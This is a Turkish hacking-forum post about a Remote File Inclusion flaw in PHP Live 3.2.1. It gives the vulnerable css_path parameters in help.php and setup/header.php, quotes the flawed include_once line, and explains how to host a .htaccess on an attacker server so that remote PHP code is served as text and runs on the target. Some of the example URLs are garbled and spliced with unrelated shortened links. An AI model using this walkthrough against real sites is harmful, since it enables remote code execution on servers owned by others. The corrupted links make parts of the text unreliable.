PHP Live = 3.2.1 Açığı

SanalFiravun

Katılımcı Üye
7 Ara 2007
562
13
Dünyanın Tam ortası
Açık Remote File Inclusion’dur. Kaynak dosyalar

help.php?css_path=htt://www.si tenic.com/
setup/header.php?css_path=htt:// www.siteniz.com/

Peki nedir bu Remote File Inclusion?
Remote File Inclusion, php’deki include() fonksiyonun bir açığıdır. Eğer include fonksiyonunu URL’nizden gelen bir değişken ile kullanıyorsanız başka sitelerden dosya include edilmesini kapatmalısınız.

PHPlive’daki açık,
include_once( $css_path."css/default.php" )
Yani $css_patch yerine [URL="https://tik.lat/mjIbY"] http://www.siteniz.com [url]https://tik.lat/FI66I
ault.php dosyasını include edecektir ve içindeki kodları çalıştıracaktır.

Peki .php dosyası içindeki kodlar server tarafından derlenip gösteriliyor bu nedenle client side yani başka sunucu üzerindeki atak yaptığım PHPlive kodları göremiyor? Ne yapacaz?
Apache sunucularda .htaccess ile hangi dosyaya nasıl davranılacağını söyleyebiliriz. css klasorune bir htaccess.txt dosyası upload edin içinde "AddType text/plain .php" yazsın tırnaklar olmadan. Upload ettikten sonra ftp’den ismini .htaccess olarak değiştirin. (windows. htaccess dosyalara izin vermez. ama komut satırından ren komutu ile dosya ismini değiştirebilirsiniz)

Ve artık php dosyalarımız text dosyası olarak gözüküyor. Rahat rahat kodlarımızı çalıştırabiliriz

www.php.net
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.